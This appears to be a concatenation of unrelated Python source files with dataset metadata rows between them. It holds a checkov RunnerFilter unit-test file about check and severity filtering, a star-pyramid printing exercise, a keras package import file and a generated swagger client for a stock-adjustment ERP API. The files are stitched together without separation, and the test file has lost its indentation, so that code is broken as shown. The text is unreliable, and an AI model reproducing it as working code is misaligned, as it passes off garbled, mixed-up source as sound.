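# RunnerFilter(checks=["CHECK_*"], skip_checks=["CHECK_2"]) runs every
# built-in check whose id matches CHECK_* except CHECK_2, since an explicit
# skip takes priority over an enable.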
def test_should_run_default(self):
instance = RunnerFilter()
self.assertTrue(instance.should_run_check(check_id="CHECK_1"))
def test_should_run_specific_enable(self):
instance = RunnerFilter(checks=["CHECK_1"])
self.assertTrue(instance.should_run_check(check_id="CHECK_1"))
def test_should_run_specific_enable_bc(self):
instance = RunnerFilter(checks=["BC_CHECK_1"])
self.assertTrue(instance.should_run_check(check_id="CHECK_1", bc_check_id="BC_CHECK_1"))
def test_should_run_wildcard_enable(self):
instance = RunnerFilter(checks=["CHECK_*"])
self.assertTrue(instance.should_run_check(check_id="CHECK_1"))
def test_should_run_wildcard_enable_bc(self):
instance = RunnerFilter(checks=["BC_CHECK_*"])
self.assertTrue(instance.should_run_check(check_id="CHECK_1", bc_check_id="BC_CHECK_1"))
def test_should_run_omitted_specific_enable(self):
instance = RunnerFilter(checks=["CHECK_1"])
self.assertFalse(instance.should_run_check(check_id="CHECK_999"))
def test_should_run_omitted_specific_enable_bc_id(self):
instance = RunnerFilter(checks=["BC_CHECK_1"])
self.assertFalse(instance.should_run_check(check_id="CHECK_999", bc_check_id="BC_CHECK_999"))
def test_should_run_specific_disable(self):
instance = RunnerFilter(skip_checks=["CHECK_1"])
self.assertFalse(instance.should_run_check(check_id="CHECK_1"))
def test_should_run_specific_disable_bc_id(self):
instance = RunnerFilter(skip_checks=["BC_CHECK_1"])
self.assertFalse(instance.should_run_check(check_id="CHECK_1", bc_check_id="BC_CHECK_1"))
def test_should_run_omitted_specific_disable(self):
instance = RunnerFilter(skip_checks=["CHECK_1"])
self.assertTrue(instance.should_run_check(check_id="CHECK_999"))
def test_should_run_omitted_specific_disable_bc_id(self):
instance = RunnerFilter(skip_checks=["BC_CHECK_1"])
self.assertTrue(instance.should_run_check(check_id="CHECK_999", bc_check_id="BC_CHECK_999"))
def test_should_run_external(self):
instance = RunnerFilter(skip_checks=["CHECK_1"])
instance.notify_external_check("EXT_CHECK_999")
self.assertTrue(instance.should_run_check(check_id="EXT_CHECK_999"))
def test_should_run_external2(self):
instance = RunnerFilter(checks=["CHECK_1"], skip_checks=["CHECK_2"])
instance.notify_external_check("EXT_CHECK_999")
self.assertFalse(instance.should_run_check(check_id="EXT_CHECK_999"))
def test_should_run_external3(self):
instance = RunnerFilter(checks=["EXT_CHECK_999"])
instance.notify_external_check("EXT_CHECK_999")
self.assertTrue(instance.should_run_check(check_id="EXT_CHECK_999"))
def test_should_run_external4(self):
instance = RunnerFilter(checks=["CHECK_1"], skip_checks=["CHECK_2"], all_external=True)
instance.notify_external_check("EXT_CHECK_999")
self.assertTrue(instance.should_run_check(check_id="EXT_CHECK_999"))
def test_should_run_external_severity(self):
instance = RunnerFilter(checks=["CHECK_1"], skip_checks=["CHECK_2", "HIGH"], all_external=True)
instance.notify_external_check("EXT_CHECK_999")
self.assertFalse(instance.should_run_check(check_id="EXT_CHECK_999", severity=Severities[BcSeverities.HIGH]))
def test_should_run_external_disabled(self):
instance = RunnerFilter(skip_checks=["CHECK_1", "EXT_CHECK_999"])
instance.notify_external_check("EXT_CHECK_999")
self.assertFalse(instance.should_run_check(check_id="EXT_CHECK_999"))
def test_should_run_external_disabled2(self):
instance = RunnerFilter(skip_checks=["CHECK_1", "EXT_CHECK_999"], all_external=True)
instance.notify_external_check("EXT_CHECK_999")
self.assertFalse(instance.should_run_check(check_id="EXT_CHECK_999"))
def test_should_run_specific_disable_AND_enable(self):
instance = RunnerFilter(checks=["CHECK_1"], skip_checks=["CHECK_1"])
        # prioritize the disable; this combination is not valid input anyway and would be blocked in main.py
self.assertFalse(instance.should_run_check(check_id="CHECK_1"))
def test_should_run_omitted_wildcard(self):
instance = RunnerFilter(skip_checks=["CHECK_AWS*"])
self.assertTrue(instance.should_run_check(check_id="CHECK_999"))
def test_should_run_omitted_wildcard_bc_id(self):
instance = RunnerFilter(skip_checks=["BC_CHECK_AWS*"])
self.assertTrue(instance.should_run_check(check_id="CHECK_999", bc_check_id="BC_CHECK_999"))
def test_should_run_omitted_wildcard2(self):
instance = RunnerFilter(skip_checks=["CHECK_AWS*"])
self.assertFalse(instance.should_run_check(check_id="CHECK_AWS_909"))
def test_should_run_omitted_wildcard2_bc_id(self):
instance = RunnerFilter(skip_checks=["BC_CHECK_AWS*"])
self.assertFalse(instance.should_run_check(check_id="CHECK_AWS_909", bc_check_id="BC_CHECK_AWS_909"))
def test_should_run_omitted_wildcard3(self):
instance = RunnerFilter(skip_checks=["CHECK_AWS*","CHECK_AZURE*"])
self.assertTrue(instance.should_run_check(check_id="EXT_CHECK_909"))
def test_should_run_omitted_wildcard4(self):
instance = RunnerFilter(skip_checks=["CHECK_AWS*","CHECK_AZURE_01"])
self.assertFalse(instance.should_run_check(check_id="CHECK_AZURE_01"))
def test_should_run_severity1(self):
instance = RunnerFilter(checks=["LOW"])
self.assertTrue(instance.should_run_check(check_id='', severity=Severities[BcSeverities.LOW]))
def test_should_run_severity2(self):
instance = RunnerFilter(skip_checks=["LOW"])
self.assertTrue(instance.should_run_check(check_id='', severity=Severities[BcSeverities.HIGH]))
def test_should_skip_severity1(self):
instance = RunnerFilter(checks=["HIGH"])
self.assertFalse(instance.should_run_check(check_id='', severity=Severities[BcSeverities.LOW]))
def test_should_skip_severity2(self):
instance = RunnerFilter(skip_checks=["LOW"])
self.assertFalse(instance.should_run_check(check_id='', severity=Severities[BcSeverities.LOW]))
def test_should_run_check_id(self):
instance = RunnerFilter(checks=['CKV_AWS_45'])
from checkov.terraform.checks.resource.aws.LambdaEnvironmentCredentials import check
self.assertTrue(instance.should_run_check(check=check))
def test_should_run_check_id_omitted(self):
instance = RunnerFilter(checks=['CKV_AWS_99'])
from checkov.terraform.checks.resource.aws.LambdaEnvironmentCredentials import check
self.assertFalse(instance.should_run_check(check=check))
def test_should_run_check_bc_id(self):
instance = RunnerFilter(checks=['BC_AWS_45'])
from checkov.terraform.checks.resource.aws.LambdaEnvironmentCredentials import check
check.bc_id = 'BC_AWS_45'
self.assertTrue(instance.should_run_check(check=check))
def test_should_run_check_bc_id_omitted(self):
instance = RunnerFilter(checks=['BC_AWS_99'])
from checkov.terraform.checks.resource.aws.LambdaEnvironmentCredentials import check
check.bc_id = 'BC_AWS_45'
self.assertFalse(instance.should_run_check(check=check))
def test_should_skip_check_id(self):
instance = RunnerFilter(skip_checks=['CKV_AWS_45'])
from checkov.terraform.checks.resource.aws.LambdaEnvironmentCredentials import check
self.assertFalse(instance.should_run_check(check=check))
def test_should_skip_check_id_omitted(self):
instance = RunnerFilter(skip_checks=['CKV_AWS_99'])
from checkov.terraform.checks.resource.aws.LambdaEnvironmentCredentials import check
self.assertTrue(instance.should_run_check(check=check))
def test_should_skip_check_bc_id(self):
instance = RunnerFilter(skip_checks=['BC_AWS_45'])
from checkov.terraform.checks.resource.aws.LambdaEnvironmentCredentials import check
check.bc_id = 'BC_AWS_45'
self.assertFalse(instance.should_run_check(check=check))
def test_should_skip_check_bc_id_omitted(self):
instance = RunnerFilter(skip_checks=['BC_AWS_99'])
from checkov.terraform.checks.resource.aws.LambdaEnvironmentCredentials import check
check.bc_id = 'BC_AWS_45'
self.assertTrue(instance.should_run_check(check=check))
def test_should_run_check_severity(self):
instance = RunnerFilter(checks=['LOW'])
from checkov.terraform.checks.resource.aws.LambdaEnvironmentCredentials import check
check.severity = Severities[BcSeverities.LOW]
self.assertTrue(instance.should_run_check(check=check))
def test_should_run_check_severity_omitted(self):
instance = RunnerFilter(checks=['HIGH'])
from checkov.terraform.checks.resource.aws.LambdaEnvironmentCredentials import check
check.severity = Severities[BcSeverities.LOW]
self.assertFalse(instance.should_run_check(check=check))
def test_should_run_check_severity_implicit(self):
instance = RunnerFilter(checks=['LOW'])
from checkov.terraform.checks.resource.aws.LambdaEnvironmentCredentials import check
check.severity = Severities[BcSeverities.HIGH]
self.assertTrue(instance.should_run_check(check=check))
def test_should_skip_check_severity(self):
instance = RunnerFilter(skip_checks=['LOW'])
from checkov.terraform.checks.resource.aws.LambdaEnvironmentCredentials import check
check.severity = Severities[BcSeverities.LOW]
self.assertFalse(instance.should_run_check(check=check))
def test_should_skip_check_severity_implicit(self):
instance = RunnerFilter(skip_checks=['HIGH'])
from checkov.terraform.checks.resource.aws.LambdaEnvironmentCredentials import check
check.severity = Severities[BcSeverities.LOW]
self.assertFalse(instance.should_run_check(check=check))
def test_should_skip_check_severity_threshold_exceeded(self):
instance = RunnerFilter(skip_checks=['LOW'])
from checkov.terraform.checks.resource.aws.LambdaEnvironmentCredentials import check
check.severity = Severities[BcSeverities.HIGH]
self.assertTrue(instance.should_run_check(check=check))
def test_check_severity_split_no_sev(self):
instance = RunnerFilter(checks=['XYZ'])
self.assertIsNone(instance.check_threshold)
self.assertEqual(instance.checks, ['XYZ'])
def test_check_severity_split_skip_no_sev(self):
instance = RunnerFilter(skip_checks=['XYZ'])
self.assertIsNone(instance.skip_check_threshold)
self.assertEqual(instance.skip_checks, ['XYZ'])
def test_check_severity_split_one_sev(self):
instance = RunnerFilter(checks=['MEDIUM'])
self.assertEqual(instance.check_threshold, Severities[BcSeverities.MEDIUM])
self.assertEqual(instance.checks, [])
def test_check_severity_split_two_sev(self):
instance = RunnerFilter(checks=['MEDIUM', 'LOW'])
# should take the lowest severity
self.assertEqual(instance.check_threshold, Severities[BcSeverities.LOW])
self.assertEqual(instance.checks, [])
def test_check_severity_split_skip_one_sev(self):
instance = RunnerFilter(skip_checks=['MEDIUM'])
self.assertEqual(instance.skip_check_threshold, Severities[BcSeverities.MEDIUM])
self.assertEqual(instance.skip_checks, [])
def test_check_severity_split_skip_two_sev(self):
instance = RunnerFilter(skip_checks=['LOW', 'MEDIUM'])
# should take the highest severity
self.assertEqual(instance.skip_check_threshold, Severities[BcSeverities.MEDIUM])
self.assertEqual(instance.skip_checks, [])
def test_run_sev_id_1(self):
instance = RunnerFilter(checks=['HIGH'], skip_checks=['CKV_AWS_123'])
# run all high and above, but skip this one ID regardless of severity
self.assertTrue(instance.should_run_check(check_id='CKV_AWS_789', severity=Severities[BcSeverities.HIGH]))
self.assertTrue(instance.should_run_check(check_id='CKV_AWS_789', severity=Severities[BcSeverities.CRITICAL]))
self.assertFalse(instance.should_run_check(check_id='CKV_AWS_789', severity=Severities[BcSeverities.LOW]))
self.assertFalse(instance.should_run_check(check_id='CKV_AWS_123', severity=Severities[BcSeverities.HIGH]))
self.assertFalse(instance.should_run_check(check_id='CKV_AWS_123', severity=Severities[BcSeverities.CRITICAL]))
def test_run_sev_no_check_sev(self):
instance = RunnerFilter(checks=['HIGH'])
# if a check severity is used, skip any check without it
self.assertFalse(instance.should_run_check(check_id='CKV_AWS_789'))
def test_run_sev_no_check_sev_with_id(self):
instance = RunnerFilter(checks=['HIGH', 'CKV_AWS_789'])
        # an explicitly listed ID runs even when a severity filter would otherwise exclude it
self.assertTrue(instance.should_run_check(check_id='CKV_AWS_789'))
def test_skip_sev_no_check_sev(self):
instance = RunnerFilter(skip_checks=['HIGH'])
# if a skip check severity is used, run any check without it
self.assertTrue(instance.should_run_check(check_id='CKV_AWS_789'))
def test_skip_sev_no_check_sev_with_id(self):
instance = RunnerFilter(skip_checks=['HIGH', 'CKV_AWS_789'])
        # an explicitly listed skip ID is skipped even when the check has no severity
self.assertFalse(instance.should_run_check(check_id='CKV_AWS_789'))
def test_run_sev_id_2(self):
instance = RunnerFilter(checks=['CKV_AWS_123'], skip_checks=['MEDIUM'])
# Run AWS_123, unless it is MEDIUM or below
self.assertFalse(instance.should_run_check(check_id='CKV_AWS_789', severity=Severities[BcSeverities.CRITICAL]))
self.assertFalse(instance.should_run_check(check_id='CKV_AWS_789', severity=Severities[BcSeverities.HIGH]))
self.assertTrue(instance.should_run_check(check_id='CKV_AWS_123', severity=Severities[BcSeverities.CRITICAL]))
self.assertTrue(instance.should_run_check(check_id='CKV_AWS_123', severity=Severities[BcSeverities.HIGH]))
self.assertFalse(instance.should_run_check(check_id='CKV_AWS_123', severity=Severities[BcSeverities.MEDIUM]))
self.assertFalse(instance.should_run_check(check_id='CKV_AWS_123', severity=Severities[BcSeverities.LOW]))
def test_run_two_sev_1(self):
instance = RunnerFilter(checks=['MEDIUM'], skip_checks=['HIGH'])
# run medium and higher, skip high and lower; skip takes priority
self.assertFalse(instance.should_run_check(check_id='CKV_AWS_789', severity=Severities[BcSeverities.HIGH]))
self.assertTrue(instance.should_run_check(check_id='CKV_AWS_789', severity=Severities[BcSeverities.CRITICAL]))
self.assertFalse(instance.should_run_check(check_id='CKV_AWS_789', severity=Severities[BcSeverities.LOW]))
self.assertFalse(instance.should_run_check(check_id='CKV_AWS_123', severity=Severities[BcSeverities.MEDIUM]))
def test_run_two_sev_2(self):
instance = RunnerFilter(checks=['HIGH'], skip_checks=['MEDIUM'])
# run HIGH and higher, skip MEDIUM and lower (so just run HIGH or higher)
self.assertTrue(instance.should_run_check(check_id='CKV_AWS_789', severity=Severities[BcSeverities.HIGH]))
self.assertTrue(instance.should_run_check(check_id='CKV_AWS_789', severity=Severities[BcSeverities.CRITICAL]))
self.assertFalse(instance.should_run_check(check_id='CKV_AWS_789', severity=Severities[BcSeverities.LOW]))
self.assertFalse(instance.should_run_check(check_id='CKV_AWS_123', severity=Severities[BcSeverities.MEDIUM]))
def test_run_sev_explicit(self):
instance = RunnerFilter(checks=['MEDIUM', 'CKV_AWS_789'])
self.assertTrue(instance.should_run_check(check_id='CKV_AWS_789', severity=Severities[BcSeverities.LOW]))
self.assertFalse(instance.should_run_check(check_id='CKV_AWS_123', severity=Severities[BcSeverities.LOW]))
self.assertTrue(instance.should_run_check(check_id='CKV_AWS_123', severity=Severities[BcSeverities.HIGH]))
def test_skip_sev_explicit(self):
instance = RunnerFilter(skip_checks=['MEDIUM', 'CKV_AWS_789'])
self.assertFalse(instance.should_run_check(check_id='CKV_AWS_789', severity=Severities[BcSeverities.HIGH]))
self.assertFalse(instance.should_run_check(check_id='CKV_AWS_123', severity=Severities[BcSeverities.LOW]))
self.assertTrue(instance.should_run_check(check_id='CKV_AWS_123', severity=Severities[BcSeverities.HIGH]))
def test_within_threshold(self):
instance = RunnerFilter(checks=['LOW'])
self.assertTrue(instance.within_threshold(Severities[BcSeverities.LOW]))
self.assertTrue(instance.within_threshold(Severities[BcSeverities.MEDIUM]))
instance = RunnerFilter(checks=['HIGH'])
self.assertFalse(instance.within_threshold(Severities[BcSeverities.LOW]))
self.assertFalse(instance.within_threshold(Severities[BcSeverities.MEDIUM]))
instance = RunnerFilter(skip_checks=['HIGH'])
self.assertFalse(instance.within_threshold(Severities[BcSeverities.LOW]))
self.assertFalse(instance.within_threshold(Severities[BcSeverities.MEDIUM]))
instance = RunnerFilter(skip_checks=['LOW'])
self.assertFalse(instance.within_threshold(Severities[BcSeverities.LOW]))
self.assertTrue(instance.within_threshold(Severities[BcSeverities.MEDIUM]))
instance = RunnerFilter(checks=['HIGH'], skip_checks=['LOW'])
self.assertFalse(instance.within_threshold(Severities[BcSeverities.LOW]))
self.assertFalse(instance.within_threshold(Severities[BcSeverities.MEDIUM]))
self.assertTrue(instance.within_threshold(Severities[BcSeverities.HIGH]))
if __name__ == '__main__':
unittest.main()
| 53.62931 | 119 | 0.745111 | 2,336 | 18,663 | 5.60488 | 0.059503 | 0.073551 | 0.084473 | 0.120981 | 0.924311 | 0.887726 | 0.84717 | 0.789659 | 0.753532 | 0.719698 | 0 | 0.017106 | 0.147993 | 18,663 | 347 | 120 | 53.783862 | 0.806301 | 0.052242 | 0 | 0.505837 | 0 | 0 | 0.078282 | 0 | 0 | 0 | 0 | 0 | 0.36965 | 1 | 0.233463 | false | 0 | 0.070039 | 0 | 0.307393 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
bed8220415ade7aedc4542f817d716dc1adfed03 | 143 | py | Python | question_src/question4.py | kwonbosung02/PythonCoding | 8ae9a21c1d80102a14b582b2581cf3f0baed8786 | [
"MIT"
] | 5 | 2019-04-24T05:13:31.000Z | 2020-07-13T04:57:54.000Z | question_src/question4.py | kwonbosung02/PythonCoding | 8ae9a21c1d80102a14b582b2581cf3f0baed8786 | [
"MIT"
] | null | null | null | question_src/question4.py | kwonbosung02/PythonCoding | 8ae9a21c1d80102a14b582b2581cf3f0baed8786 | [
"MIT"
] | null | null | null |
# Problem 1: right-angled star triangle
a = int(input())
for i in range(1, a+1):
    print(i*"*")
# Problem 2: centered star pyramid
a = int(input())
for i in range(1, a+1):
    print((a-i)*" " + (2*i-1)*"*")
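# Worked example with a = 3 (rows i = 1..a):
#   Problem 1 prints: *, **, ***
#   Problem 2 prints a centered pyramid:
#     "  *"
#     " ***"
#     "*****"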
| 11.916667 | 34 | 0.461538 | 30 | 143 | 2.2 | 0.366667 | 0.121212 | 0.272727 | 0.363636 | 0.818182 | 0.818182 | 0.818182 | 0.818182 | 0.818182 | 0.818182 | 0 | 0.055046 | 0.237762 | 143 | 11 | 35 | 13 | 0.550459 | 0.055944 | 0 | 0.666667 | 0 | 0 | 0.022727 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.333333 | 0 | 0 | 0 | null | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
834a98f3b870a52b44e7e3ca6e46d73152795911 | 238 | py | Python | keras_text_cls/model/__init__.py | titicaca/keras-text-cls | de1d70e64946cae2da06bda46b9ebace2b0b4f00 | [
"MIT"
] | 3 | 2019-03-01T15:50:12.000Z | 2021-05-03T15:08:10.000Z | keras_text_cls/model/__init__.py | titicaca/keras-text-cls | de1d70e64946cae2da06bda46b9ebace2b0b4f00 | [
"MIT"
] | null | null | null | keras_text_cls/model/__init__.py | titicaca/keras-text-cls | de1d70e64946cae2da06bda46b9ebace2b0b4f00 | [
"MIT"
] | 1 | 2020-08-08T02:53:56.000Z | 2020-08-08T02:53:56.000Z | from keras_text_cls.model.text_mlp import *
from keras_text_cls.model.text_cnn import *
from keras_text_cls.model.text_rcnn import *
from keras_text_cls.model.text_han import *
from keras_text_cls.model.utils import pad_text_indices
| 39.666667 | 56 | 0.836134 | 42 | 238 | 4.357143 | 0.309524 | 0.245902 | 0.355191 | 0.437158 | 0.79235 | 0.79235 | 0.508197 | 0 | 0 | 0 | 0 | 0 | 0.105042 | 238 | 5 | 57 | 47.6 | 0.859155 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 8 |
55ccf2b467ec7b0031a39e1b9563dc0bad427754 | 12,632 | py | Python | beanie/api/stock_adjustment_api.py | altoyield/python-beanieclient | 448b8dd328054eaf32dd7d0bdff700e603b5c27d | [
"Apache-2.0"
] | null | null | null | beanie/api/stock_adjustment_api.py | altoyield/python-beanieclient | 448b8dd328054eaf32dd7d0bdff700e603b5c27d | [
"Apache-2.0"
] | null | null | null | beanie/api/stock_adjustment_api.py | altoyield/python-beanieclient | 448b8dd328054eaf32dd7d0bdff700e603b5c27d | [
"Apache-2.0"
] | null | null | null | # coding: utf-8
"""
Beanie ERP API
An API specification for interacting with the Beanie ERP system # noqa: E501
OpenAPI spec version: 0.8
Contact: dev@bean.ie
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from beanie.api_client import ApiClient
class StockAdjustmentApi(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
Ref: https://github.com/swagger-api/swagger-codegen
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
def add_stock_adjustment(self, stock_adjustments, **kwargs): # noqa: E501
"""add_stock_adjustment # noqa: E501
Creates a new stock adjustment in the system # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.add_stock_adjustment(stock_adjustments, async=True)
>>> result = thread.get()
:param async bool
:param StockAdjustmentInput stock_adjustments: Stock adjustment to add to the system (required)
:return: StockAdjustment
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.add_stock_adjustment_with_http_info(stock_adjustments, **kwargs) # noqa: E501
else:
(data) = self.add_stock_adjustment_with_http_info(stock_adjustments, **kwargs) # noqa: E501
return data
def add_stock_adjustment_with_http_info(self, stock_adjustments, **kwargs): # noqa: E501
"""add_stock_adjustment # noqa: E501
Creates a new stock adjustment in the system # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.add_stock_adjustment_with_http_info(stock_adjustments, async=True)
>>> result = thread.get()
:param async bool
:param StockAdjustmentInput stock_adjustments: Stock adjustment to add to the system (required)
:return: StockAdjustment
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['stock_adjustments'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method add_stock_adjustment" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'stock_adjustments' is set
if ('stock_adjustments' not in params or
params['stock_adjustments'] is None):
raise ValueError("Missing the required parameter `stock_adjustments` when calling `add_stock_adjustment`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'stock_adjustments' in params:
body_params = params['stock_adjustments']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['api_key'] # noqa: E501
return self.api_client.call_api(
'/stock_adjustments', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='StockAdjustment', # noqa: E501
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def find_stock_adjustment_by_id(self, id, **kwargs): # noqa: E501
"""Find Stock adjustment by ID # noqa: E501
Returns a single stock adjustment if the user has access # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.find_stock_adjustment_by_id(id, async=True)
>>> result = thread.get()
:param async bool
:param int id: ID of stock adjustment to fetch (required)
:return: StockAdjustment
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.find_stock_adjustment_by_id_with_http_info(id, **kwargs) # noqa: E501
else:
(data) = self.find_stock_adjustment_by_id_with_http_info(id, **kwargs) # noqa: E501
return data
def find_stock_adjustment_by_id_with_http_info(self, id, **kwargs): # noqa: E501
"""Find Stock adjustment by ID # noqa: E501
Returns a single stock adjustment if the user has access # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.find_stock_adjustment_by_id_with_http_info(id, async=True)
>>> result = thread.get()
:param async bool
:param int id: ID of stock adjustment to fetch (required)
:return: StockAdjustment
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method find_stock_adjustment_by_id" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params or
params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `find_stock_adjustment_by_id`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in params:
path_params['id'] = params['id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['api_key'] # noqa: E501
return self.api_client.call_api(
'/stock_adjustments/{id}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='StockAdjustment', # noqa: E501
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def find_stock_adjustments(self, **kwargs): # noqa: E501
"""All stock adjustment # noqa: E501
Returns all stock adjustment from the system that the user has access to # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.find_stock_adjustments(async=True)
>>> result = thread.get()
:param async bool
:param list[str] tags: tags to filter by
:param int limit: Maximum number of results to return
:return: list[StockAdjustment]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.find_stock_adjustments_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.find_stock_adjustments_with_http_info(**kwargs) # noqa: E501
return data
def find_stock_adjustments_with_http_info(self, **kwargs): # noqa: E501
"""All stock adjustment # noqa: E501
Returns all stock adjustment from the system that the user has access to # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.find_stock_adjustments_with_http_info(async=True)
>>> result = thread.get()
:param async bool
:param list[str] tags: tags to filter by
:param int limit: Maximum number of results to return
:return: list[StockAdjustment]
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['tags', 'limit'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method find_stock_adjustments" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
if 'tags' in params:
query_params.append(('tags', params['tags'])) # noqa: E501
collection_formats['tags'] = 'csv' # noqa: E501
if 'limit' in params:
query_params.append(('limit', params['limit'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['api_key'] # noqa: E501
return self.api_client.call_api(
'/stock_adjustments', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='list[StockAdjustment]', # noqa: E501
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
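# Hypothetical usage sketch (an addition, not generated code): the call
# pattern described by the docstrings above, assuming `api_key` auth has
# already been configured on the ApiClient.
if __name__ == '__main__':
    client = ApiClient()
    api = StockAdjustmentApi(client)
    # Synchronous call: returns the deserialized list directly.
    adjustments = api.find_stock_adjustments(limit=10)
    # Asynchronous call: returns a thread whose .get() blocks for the result.
    # (`async` became a reserved word in Python 3.7, hence the ** workaround.)
    thread = api.find_stock_adjustments(limit=10, **{'async': True})
    adjustments = thread.get()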
| 37.933934 | 132 | 0.615421 | 1,454 | 12,632 | 5.110041 | 0.117607 | 0.052759 | 0.022611 | 0.029071 | 0.889502 | 0.869044 | 0.842127 | 0.823688 | 0.797577 | 0.795962 | 0 | 0.017451 | 0.296865 | 12,632 | 332 | 133 | 38.048193 | 0.819072 | 0.061431 | 0 | 0.71345 | 1 | 0 | 0.169369 | 0.045077 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.023392 | null | null | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 9 |
55d3d6012a62e8563637d62d38829ea5c4916a0d | 20,339 | py | Python | train-mtcnn-zq-mxnet/core/symbol.py | zzzkk2009/anti-spoofing | ac3992547c430619e236b338575109d7ecbba654 | [
"MIT"
] | 13 | 2018-12-19T07:43:46.000Z | 2020-06-30T13:10:08.000Z | train-mtcnn-zq-mxnet/core/symbol.py | zzzkk2009/anti-spoofing | ac3992547c430619e236b338575109d7ecbba654 | [
"MIT"
